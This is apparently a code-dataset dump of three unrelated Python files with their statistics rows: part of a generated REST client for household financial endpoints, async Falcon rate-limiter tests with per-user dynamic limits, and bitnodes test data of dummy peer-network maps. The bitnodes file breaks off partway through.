post_params=form_params,
files=local_var_files,
response_type='PagePortfolioHoldingAgg', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_client_transaction_using_get(self, household_id, **kwargs): # noqa: E501
"""List all household's client ids transactions # noqa: E501
Get the information for all transactions under a household client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_transaction_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_client_transaction_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_client_transaction_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_client_transaction_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""List all household's client ids transactions # noqa: E501
Get the information for all transactions under a household client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_transaction_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_client_transaction_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_client_transaction_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}/transaction', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioTransaction', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_using_get(self, household_id, **kwargs): # noqa: E501
"""Retrieve a Household # noqa: E501
Retrieve the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""Retrieve a Household # noqa: E501
Retrieve the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Household', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_household_using_put(self, household, household_id, **kwargs): # noqa: E501
"""Update a Household # noqa: E501
Update the information for a Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_household_using_put(household, household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object household: household (required)
:param str household_id: UUID household_id (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_household_using_put_with_http_info(household, household_id, **kwargs) # noqa: E501
else:
(data) = self.update_household_using_put_with_http_info(household, household_id, **kwargs) # noqa: E501
return data
def update_household_using_put_with_http_info(self, household, household_id, **kwargs):  # noqa: E501
    """Update a Household  # noqa: E501

    Update the information for a Household.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_household_using_put_with_http_info(household, household_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param object household: household (required)
    :param str household_id: UUID household_id (required)
    :return: Household
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted keyword arguments; anything else raises TypeError.
    all_params = ['household', 'household_id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() snapshots every local defined so far (self, household,
    # household_id, kwargs, all_params); the loop below then folds the
    # validated kwargs entries into the same dict. Statement order matters.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_household_using_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'household' is set
    if self.api_client.client_side_validation and ('household' not in params or
                                                   params['household'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `household` when calling `update_household_using_put`")  # noqa: E501
    # verify the required parameter 'household_id' is set
    if self.api_client.client_side_validation and ('household_id' not in params or
                                                   params['household_id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `household_id` when calling `update_household_using_put`")  # noqa: E501

    collection_formats = {}

    # household_id is interpolated into the URL path template below.
    path_params = {}
    if 'household_id' in params:
        path_params['household_id'] = params['household_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The household object is sent as the JSON request body.
    body_params = None
    if 'household' in params:
        body_params = params['household']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['*/*'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    return self.api_client.call_api(
        '/nucleus/v1/household/{household_id}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Household',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 42.71694
| 165
| 0.620299
| 4,547
| 39,086
| 5.061579
| 0.047504
| 0.052488
| 0.028069
| 0.025027
| 0.962807
| 0.956289
| 0.950641
| 0.94156
| 0.934086
| 0.931132
| 0
| 0.017227
| 0.290104
| 39,086
| 914
| 166
| 42.763676
| 0.812232
| 0.332856
| 0
| 0.818557
| 1
| 0
| 0.20341
| 0.059001
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035052
| false
| 0
| 0.008247
| 0
| 0.094845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8c99aed4e87cbbf98b94b88aa1643f7b1efba5aa
| 7,220
|
py
|
Python
|
tests/async_tests/test_dynamic_limits.py
|
zoltan-fedor/falcon-limits
|
e145c8b6cb9567fa1df1bbc4430c673bb0a34f48
|
[
"MIT"
] | 1
|
2020-10-10T14:48:37.000Z
|
2020-10-10T14:48:37.000Z
|
tests/async_tests/test_dynamic_limits.py
|
zoltan-fedor/falcon-limits
|
e145c8b6cb9567fa1df1bbc4430c673bb0a34f48
|
[
"MIT"
] | null | null | null |
tests/async_tests/test_dynamic_limits.py
|
zoltan-fedor/falcon-limits
|
e145c8b6cb9567fa1df1bbc4430c673bb0a34f48
|
[
"MIT"
] | null | null | null |
""" Testing the dynamic_limits option
"""
from falcon import asgi, testing, HTTP_200, HTTP_429, HTTP_500
from falcon_limiter import AsyncLimiter
from falcon_limiter.utils import get_remote_addr
from time import sleep
def test_default_dynamic_limits():
    """ Test using the default_dynamic_limits option to change the limit per user
    """
    limiter = AsyncLimiter(
        key_func=get_remote_addr,
        default_dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
        if req.get_header('APIUSER') == 'admin' else '2/second'
    )

    @limiter.limit()
    class ThingsResource:
        async def on_get(self, req, resp):
            resp.body = 'Hello world!'

    app = asgi.App(middleware=limiter.middleware)
    app.add_route('/things', ThingsResource())
    client = testing.TestClient(app)

    # 'normal' user: the first two requests within the second succeed...
    for _ in range(2):
        assert client.simulate_get('/things').status == HTTP_200
    # ...and the third trips the 2/second limit
    assert client.simulate_get('/things').status == HTTP_429

    # 'admin' user is granted 5 calls per second
    admin_header = {"APIUSER": "admin"}
    for _ in range(5):
        assert client.simulate_get('/things', headers=admin_header).status == HTTP_200
    # the 6th call within the same second fails even for the admin
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_429

    # once the 1-second window has elapsed, the admin may call again
    sleep(1)
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_200
def test_dynamic_limits_on_method():
    """ Test using the dynamic_limits param of the method decorators to change the limit per user
    """
    limiter = AsyncLimiter(
        key_func=get_remote_addr,
        default_limits=["10 per hour", "1 per second"]
    )

    class ThingsResource:
        @limiter.limit(dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
                       if req.get_header('APIUSER') == 'admin' else '2/second')
        async def on_get(self, req, resp):
            resp.body = 'Hello world!'

        async def on_post(self, req, resp):
            resp.body = 'Hello world!'

    app = asgi.App(middleware=limiter.middleware)
    app.add_route('/things', ThingsResource())
    client = testing.TestClient(app)

    # 'normal' user: two GETs pass, the third trips the 2/second limit
    for _ in range(2):
        assert client.simulate_get('/things').status == HTTP_200
    assert client.simulate_get('/things').status == HTTP_429

    # 'admin' user is allowed 5 GETs per second
    admin_header = {"APIUSER": "admin"}
    for _ in range(5):
        assert client.simulate_get('/things', headers=admin_header).status == HTTP_200
    # the 6th GET in the same second is rejected even for the admin
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_429

    # after the 1-second window the admin may call again
    sleep(1)
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_200

    # the undecorated on_post() method carries no limit at all
    for _ in range(8):
        assert client.simulate_post('/things').status == HTTP_200
def test_dynamic_limits_on_method2():
    """ Test using the dynamic_limits param of the method decorators to change the limit per user
        Overwriting the default limits from the method level decorator
    """
    limiter = AsyncLimiter(
        key_func=get_remote_addr,
        default_limits=["10 per hour", "1 per second"]
    )

    @limiter.limit(dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
                   if req.get_header('APIUSER') == 'admin' else '2/second')
    class ThingsResource:
        @limiter.limit()
        async def on_get(self, req, resp):
            resp.body = 'Hello world!'

        async def on_post(self, req, resp):
            resp.body = 'Hello world!'

    app = asgi.App(middleware=limiter.middleware)
    app.add_route('/things', ThingsResource())
    client = testing.TestClient(app)

    # 'normal' user: two GETs pass, the third trips the 2/second limit
    for _ in range(2):
        assert client.simulate_get('/things').status == HTTP_200
    assert client.simulate_get('/things').status == HTTP_429

    # 'admin' user is allowed 5 GETs per second
    admin_header = {"APIUSER": "admin"}
    for _ in range(5):
        assert client.simulate_get('/things', headers=admin_header).status == HTTP_200
    # the 6th GET in the same second is rejected even for the admin
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_429

    # after the 1-second window the admin may call again
    sleep(1)
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_200
def test_dynamic_limits_on_class():
    """ Test using the dynamic_limits param of the decorators to change the limit per user
    """
    limiter = AsyncLimiter(
        key_func=get_remote_addr,
        default_limits=["10 per hour", "1 per second"]
    )

    class ThingsResource:
        @limiter.limit(dynamic_limits=lambda req, resp, resource, req_succeeded: '5/second'
                       if req.get_header('APIUSER') == 'admin' else '2/second')
        async def on_get(self, req, resp):
            resp.body = 'Hello world!'

        @limiter.limit(limits="3/second")
        async def on_post(self, req, resp):
            resp.body = 'Hello world!'

    app = asgi.App(middleware=limiter.middleware)
    app.add_route('/things', ThingsResource())
    client = testing.TestClient(app)

    # 'normal' user: two GETs pass, the third trips the 2/second limit
    for _ in range(2):
        assert client.simulate_get('/things').status == HTTP_200
    assert client.simulate_get('/things').status == HTTP_429

    # 'admin' user is allowed 5 GETs per second
    admin_header = {"APIUSER": "admin"}
    for _ in range(5):
        assert client.simulate_get('/things', headers=admin_header).status == HTTP_200
    # the 6th GET in the same second is rejected even for the admin
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_429

    # after the 1-second window the admin may call again
    sleep(1)
    assert client.simulate_get('/things', headers=admin_header).status == HTTP_200

    # the on_post() method has a static 3/second limit for normal users...
    for _ in range(3):
        assert client.simulate_post('/things').status == HTTP_200
    assert client.simulate_post('/things').status == HTTP_429

    # ...and the same 3/second limit applies to admin users too
    sleep(1)
    for _ in range(3):
        assert client.simulate_post('/things', headers=admin_header).status == HTTP_200
    assert client.simulate_post('/things', headers=admin_header).status == HTTP_429
| 30.987124
| 97
| 0.639335
| 984
| 7,220
| 4.542683
| 0.10874
| 0.045414
| 0.097315
| 0.110291
| 0.89821
| 0.891275
| 0.890604
| 0.890604
| 0.882774
| 0.8783
| 0
| 0.026465
| 0.241136
| 7,220
| 232
| 98
| 31.12069
| 0.789378
| 0.184072
| 0
| 0.884058
| 0
| 0
| 0.0959
| 0
| 0
| 0
| 0
| 0
| 0.210145
| 1
| 0.028986
| false
| 0
| 0.028986
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ca298c4f88cf2dcb1cfbf6c63b7525d80c2c849
| 25,052
|
py
|
Python
|
tests.py
|
msund/bitnodes
|
3dff0d0f6718ed6748130cb3adcfb04b4c55b467
|
[
"MIT"
] | 1
|
2022-02-28T14:40:45.000Z
|
2022-02-28T14:40:45.000Z
|
tests.py
|
msund/bitnodes
|
3dff0d0f6718ed6748130cb3adcfb04b4c55b467
|
[
"MIT"
] | null | null | null |
tests.py
|
msund/bitnodes
|
3dff0d0f6718ed6748130cb3adcfb04b4c55b467
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# tests.py - Dummy data and tests for bitnodes.
#
# Copyright (c) 2013 Addy Yeow Chin Heng <ayeowch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Dummy data and tests for bitnodes.
"""
import time
"""
Graph layout for DUMMY_NETWORK_A:
1.1.1.1
2.2.2.2
4.4.4.4
10.10.10.10
11.11.11.11
13.13.13.13
14.14.14.14
15.15.15.15
16.16.16.16
22.22.22.22
17.17.17.17
18.18.18.18
4.4.4.4
5.5.5.5
19.19.19.19
20.20.20.20
21.21.21.21
12.12.12.12
3.3.3.3
5.5.5.5
7.7.7.7
9.9.9.9
8.8.8.8
6.6.6.6
16.16.16.16
"""
# Hand-built 22-node adjacency map for the graph sketched in the docstring
# above: node IP -> list of {"ip": ...} neighbour records, mirroring the
# shape a real getaddr response would take.
DUMMY_NETWORK_A = {
    "1.1.1.1": [{"ip": "2.2.2.2"}, {"ip": "3.3.3.3"}, {"ip": "16.16.16.16"}, ],
    "2.2.2.2": [{"ip": "4.4.4.4"}, ],
    "3.3.3.3": [{"ip": "5.5.5.5"}, {"ip": "6.6.6.6"}, ],
    "4.4.4.4": [{"ip": "10.10.10.10"}, {"ip": "11.11.11.11"}, {"ip": "12.12.12.12"}, ],
    "5.5.5.5": [{"ip": "7.7.7.7"}, {"ip": "8.8.8.8"}, ],
    "6.6.6.6": [],
    "7.7.7.7": [{"ip": "9.9.9.9"}, ],
    "8.8.8.8": [],
    "9.9.9.9": [],
    "10.10.10.10": [],
    "11.11.11.11": [{"ip": "13.13.13.13"}, ],
    "12.12.12.12": [],
    "13.13.13.13": [{"ip": "14.14.14.14"}, ],
    "14.14.14.14": [{"ip": "15.15.15.15"}, {"ip": "18.18.18.18"}, {"ip": "19.19.19.19"}, {"ip": "20.20.20.20"}, ],
    "15.15.15.15": [{"ip": "16.16.16.16"}, {"ip": "17.17.17.17"}, ],
    "16.16.16.16": [{"ip": "22.22.22.22"}, ],
    "17.17.17.17": [],
    "18.18.18.18": [{"ip": "4.4.4.4"}, {"ip": "5.5.5.5"}, ],
    "19.19.19.19": [],
    "20.20.20.20": [{"ip": "21.21.21.21"}, ],
    "21.21.21.21": [],
    "22.22.22.22": [],
}
# Seed nodes (crawl entry points) for DUMMY_NETWORK_A, keyed by seed number.
DUMMY_SEEDS_A = {
    1: "1.1.1.1",
    2: "2.2.2.2",
    3: "3.3.3.3",
    4: "4.4.4.4",
    5: "5.5.5.5",
    6: "6.6.6.6",
}
"""
DUMMY_NETWORK_B was created using Gephi's random graph generation with
100 nodes and 511 edges.
"""
# Randomly generated adjacency map (100 nodes, 511 edges — see docstring
# above): node IP -> list of {"ip": ...} neighbour records.
DUMMY_NETWORK_B = {
    "5.2.7.4": [{"ip": "5.2.6.2"}, {"ip": "5.2.8.8"}, {"ip": "5.2.0.5"}, {"ip": "5.2.1.0"}, {"ip": "5.2.0.1"}, {"ip": "5.1.9.9"}, ],
    "5.2.7.5": [{"ip": "5.2.7.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.9.1"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.3"}, {"ip": "5.2.0.7"}, {"ip": "5.2.0.4"}, {"ip": "5.2.1.7"}, {"ip": "5.2.4.7"}, {"ip": "5.1.9.7"}, {"ip": "5.2.5.4"}, {"ip": "5.2.0.8"}, ],
    "5.2.7.6": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.3"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.8"}, {"ip": "5.2.1.0"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.6"}, {"ip": "5.2.5.4"}, {"ip": "5.2.2.1"}, ],
    "5.2.7.7": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.3"}, {"ip": "5.2.3.7"}, {"ip": "5.2.6.8"}, {"ip": "5.2.8.4"}, {"ip": "5.2.2.6"}, {"ip": "5.2.4.2"}, {"ip": "5.2.8.6"}, {"ip": "5.2.0.5"}, {"ip": "5.2.0.3"}, {"ip": "5.2.0.0"}, {"ip": "5.2.5.0"}, ],
    "5.2.7.0": [{"ip": "5.2.2.5"}, {"ip": "5.2.3.2"}, {"ip": "5.2.4.5"}, {"ip": "5.2.8.3"}, {"ip": "5.2.4.2"}, {"ip": "5.2.1.7"}, {"ip": "5.2.0.0"}, {"ip": "5.1.9.9"}, {"ip": "5.2.5.6"}, ],
    "5.2.7.1": [{"ip": "5.2.6.0"}, {"ip": "5.2.6.5"}, {"ip": "5.2.1.6"}, {"ip": "5.2.2.0"}, {"ip": "5.2.2.1"}, {"ip": "5.2.7.5"}, {"ip": "5.2.3.8"}, {"ip": "5.2.8.5"}, {"ip": "5.2.8.2"}, {"ip": "5.1.9.5"}, {"ip": "5.2.0.1"}, {"ip": "5.2.5.0"}, ],
    "5.2.7.2": [{"ip": "5.2.3.2"}, {"ip": "5.2.2.1"}, {"ip": "5.2.2.3"}, {"ip": "5.2.3.9"}, {"ip": "5.2.8.2"}, {"ip": "5.2.5.6"}, {"ip": "5.2.4.8"}, {"ip": "5.2.5.0"}, ],
    "5.2.7.3": [{"ip": "5.2.6.0"}, {"ip": "5.2.2.5"}, {"ip": "5.2.8.8"}, {"ip": "5.2.3.6"}, {"ip": "5.2.7.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.4"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.0"}, {"ip": "5.2.4.3"}, {"ip": "5.2.1.7"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.4"}, ],
    "5.2.7.8": [{"ip": "5.2.3.2"}, {"ip": "5.2.2.0"}, {"ip": "5.2.6.8"}, {"ip": "5.2.7.6"}, {"ip": "5.2.1.3"}, {"ip": "5.2.8.6"}, {"ip": "5.2.4.1"}, {"ip": "5.2.4.6"}, {"ip": "5.2.1.6"}, {"ip": "5.2.1.4"}, ],
    "5.2.7.9": [{"ip": "5.2.6.3"}, {"ip": "5.2.3.9"}, {"ip": "5.2.3.8"}, {"ip": "5.2.4.5"}, {"ip": "5.2.1.2"}, {"ip": "5.2.7.5"}, {"ip": "5.2.5.8"}, {"ip": "5.2.5.6"}, ],
    "5.2.6.7": [{"ip": "5.2.2.7"}, {"ip": "5.2.6.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.2"}, {"ip": "5.1.9.2"}, {"ip": "5.2.1.4"}, {"ip": "5.1.9.8"}, {"ip": "5.2.1.9"}, {"ip": "5.2.0.9"}, ],
    "5.2.6.6": [{"ip": "5.2.6.3"}, {"ip": "5.2.8.9"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.1"}, {"ip": "5.2.4.5"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.3"}, ],
    "5.2.6.5": [{"ip": "5.2.2.0"}, {"ip": "5.2.6.7"}, {"ip": "5.2.9.1"}, {"ip": "5.2.8.5"}, {"ip": "5.2.7.1"}, {"ip": "5.2.0.6"}, {"ip": "5.1.9.3"}, {"ip": "5.2.0.0"}, {"ip": "5.2.5.5"}, {"ip": "5.2.0.9"}, ],
    "5.2.6.4": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.3"}, {"ip": "5.2.1.0"}, {"ip": "5.2.8.3"}, {"ip": "5.2.4.1"}, {"ip": "5.2.4.6"}, {"ip": "5.2.4.8"}, {"ip": "5.2.5.2"}, ],
    "5.2.6.3": [{"ip": "5.2.7.9"}, {"ip": "5.2.6.6"}, {"ip": "5.2.8.9"}, {"ip": "5.2.8.5"}, {"ip": "5.2.0.7"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.5"}, {"ip": "5.2.1.5"}, {"ip": "5.2.1.8"}, {"ip": "5.2.5.2"}, {"ip": "5.2.0.8"}, {"ip": "5.2.4.7"}, ],
    "5.2.6.2": [{"ip": "5.2.2.5"}, {"ip": "5.2.2.6"}, {"ip": "5.2.8.6"}, {"ip": "5.2.7.4"}, {"ip": "5.2.8.5"}, {"ip": "5.1.9.4"}, {"ip": "5.2.0.3"}, {"ip": "5.2.5.6"}, ],
    "5.2.6.1": [{"ip": "5.2.3.0"}, {"ip": "5.2.2.2"}, {"ip": "5.2.8.7"}, {"ip": "5.2.4.5"}, {"ip": "5.2.5.5"}, {"ip": "5.2.0.8"}, ],
    "5.2.6.0": [{"ip": "5.2.3.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.3"}, {"ip": "5.2.8.1"}, {"ip": "5.1.9.2"}, ],
    "5.2.6.9": [{"ip": "5.2.2.4"}, {"ip": "5.2.1.4"}, {"ip": "5.2.2.6"}, {"ip": "5.2.2.5"}, {"ip": "5.2.8.9"}, {"ip": "5.2.2.8"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.2"}, {"ip": "5.2.8.0"}, {"ip": "5.1.9.3"}, {"ip": "5.2.0.2"}, {"ip": "5.1.9.5"}, {"ip": "5.2.8.7"}, {"ip": "5.2.2.3"}, ],
    "5.2.6.8": [{"ip": "5.2.3.0"}, {"ip": "5.2.3.3"}, {"ip": "5.2.2.7"}, {"ip": "5.2.7.8"}, {"ip": "5.2.2.3"}, {"ip": "5.2.8.4"}, {"ip": "5.2.7.7"}, {"ip": "5.2.8.2"}, {"ip": "5.2.0.6"}, {"ip": "5.2.0.7"}, {"ip": "5.2.1.6"}, {"ip": "5.2.1.5"}, {"ip": "5.1.9.9"}, {"ip": "5.2.9.1"}, {"ip": "5.2.5.2"}, {"ip": "5.2.5.1"}, {"ip": "5.2.4.7"}, ],
    "5.2.5.2": [{"ip": "5.2.3.0"}, {"ip": "5.2.6.3"}, {"ip": "5.2.6.4"}, {"ip": "5.2.8.8"}, {"ip": "5.2.6.8"}, {"ip": "5.2.8.4"}, {"ip": "5.2.9.0"}, {"ip": "5.2.8.3"}, {"ip": "5.2.8.0"}, {"ip": "5.2.1.1"}, {"ip": "5.1.9.8"}, {"ip": "5.2.2.0"}, {"ip": "5.2.1.8"}, ],
    "5.2.5.3": [{"ip": "5.2.3.0"}, {"ip": "5.2.2.7"}, {"ip": "5.2.2.1"}, {"ip": "5.2.6.6"}, {"ip": "5.2.8.0"}, {"ip": "5.2.4.5"}, {"ip": "5.2.4.9"}, ],
    "5.2.5.0": [{"ip": "5.2.2.8"}, {"ip": "5.2.7.7"}, {"ip": "5.2.7.1"}, {"ip": "5.2.7.2"}, {"ip": "5.1.9.5"}, {"ip": "5.2.4.4"}, {"ip": "5.2.1.6"}, ],
    "5.2.5.1": [{"ip": "5.1.9.6"}, {"ip": "5.2.8.8"}, {"ip": "5.2.3.6"}, {"ip": "5.2.6.8"}, {"ip": "5.1.9.2"}, {"ip": "5.2.1.0"}, {"ip": "5.2.1.5"}, {"ip": "5.1.9.7"}, {"ip": "5.1.9.8"}, {"ip": "5.2.5.4"}, ],
    "5.2.5.6": [{"ip": "5.2.3.1"}, {"ip": "5.2.6.2"}, {"ip": "5.2.7.6"}, {"ip": "5.2.7.9"}, {"ip": "5.2.8.6"}, {"ip": "5.2.3.8"}, {"ip": "5.2.9.0"}, {"ip": "5.2.7.0"}, {"ip": "5.2.2.9"}, {"ip": "5.2.7.2"}, {"ip": "5.2.4.2"}, {"ip": "5.2.1.1"}, {"ip": "5.2.8.0"}, {"ip": "5.2.8.7"}, {"ip": "5.2.8.1"}, {"ip": "5.1.9.7"}, {"ip": "5.2.1.6"}, ],
